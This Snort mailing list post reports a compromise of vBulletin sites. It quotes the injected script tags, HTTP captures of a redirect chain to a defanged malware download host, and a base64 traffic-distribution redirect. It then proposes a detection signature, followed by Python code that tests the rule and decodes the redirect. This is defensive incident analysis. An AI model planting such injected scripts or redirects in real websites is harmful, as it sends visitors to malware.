Snort mailing list archives
Compromised vBulletin sig
From: James Lay <jlay () slave-tothe-box net>
Date: Thu, 16 Apr 2015 11:30:58 -0600
Didn't see this in any current ruleset, so I thought I'd post it here. Yesterday I saw two of these. Injected into the vBulletin initial page:

<script type="text/javascript" src="meow://meh[.]com/misc.php?v=364&js=js"></script>
<script type="text/javascript" src="meow://bleh[.]com/forums/misc.php?v=420&js=js"></script>

#######################################################################################
GET /misc.php?v=364&js=js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: meh.com
Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507; bblastactivity=0
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 15:58:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT; path=/
Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
X-Powered-By: PleskLin
Server: cloudflare-nginx
CF-RAY: 1d78da121f59012e-SJC
Content-Encoding: gzip

document.location='meow://filestore72[.]info/download.php?id=f823cc00'
#######################################################################################

This in turn goes to:

#######################################################################################
GET /download.php?id=f823cc00 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: filestore72[.]info
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.0.12
Date: Wed, 15 Apr 2015 15:53:40 GMT
Content-Type: text/html
Content-Length: 161
Connection: close
Location: meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.0.12</center>
</body>
</html>
#######################################################################################

Seems to be old-ish news, but the sig is below:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SERVER-WEBAPP Compromised vbulletin site"; flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v="; uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui"; reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info; classtype:bad-unknown; sid:10000156; rev:1;)

As usual, not sure if I have this perfect so anything to improve this sig would be excellent. Thank you.

James
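To check what the posted rule's match conditions actually cover, here is an added Python re-implementation of its three uricontent tests plus the pcre, run over constructed request lines, together with a decoder for the base64 "z" parameter of the 302 Location captured above (useful for triage, since it carries the referring host and path). This is example code, not part of the post or of any Snort component; the request lines are constructed and only the first two mirror the capture.

```python
import base64
import re
from urllib.parse import parse_qs

# The pcre from the posted rule: /misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui
# (U = URI buffer, i = case-insensitive). uricontent is a substring test.
URI_PCRE = re.compile(r"misc\.php\?v=[0-9]{3}&js=js", re.IGNORECASE)

def uri_matches_rule(uri):
    """True if a request URI satisfies every content/pcre option of the rule."""
    low = uri.lower()
    return ("/misc.php?" in low and "v=" in low and "js=js" in low
            and URI_PCRE.search(uri) is not None)

def request_line_uri(request_line):
    """Pull the URI out of a request line such as 'GET /x HTTP/1.1'."""
    parts = request_line.split()
    return parts[1] if len(parts) >= 2 else ""

def hits(request_lines):
    """Return the URIs from request_lines that would fire the signature."""
    return [u for u in map(request_line_uri, request_lines) if uri_matches_rule(u)]

# Constructed samples: two that mirror the post, two benign misc.php requests
# (vBulletin uses misc.php for normal functions, so the 3-digit 'v' matters).
SAMPLE_REQUESTS = [
    "GET /misc.php?v=364&js=js HTTP/1.1",
    "GET /forums/misc.php?v=420&js=js HTTP/1.1",
    "GET /misc.php?do=showsmilies HTTP/1.1",
    "GET /misc.php?v=4&js=js HTTP/1.1",
]

# Location header value from the captured 302 (scheme/dots defanged in the post).
OBSERVED_LOCATION = (
    "meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z="
    "Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxl"
    "c3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAl"
    "M2ZpZD1mODIzY2MwMA=="
)

def decode_tds_redirect(location):
    """Decode the base64 'z' query parameter into its key/value fields."""
    query = location.split("?", 1)[1] if "?" in location else ""
    blob = parse_qs(query).get("z", [""])[0]
    decoded = base64.b64decode(blob).decode("ascii", errors="replace")
    # parse_qs also percent-decodes, so suri's %3f becomes '?'.
    return {k: v[0] for k, v in parse_qs(decoded).items()}

if __name__ == "__main__":
    print(hits(SAMPLE_REQUESTS))
    print(decode_tds_redirect(OBSERVED_LOCATION))
```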
Current thread:
- Compromised vBulletin sig James Lay (Apr 16)
- Re: Compromised vBulletin sig Matt Mickel (May 04)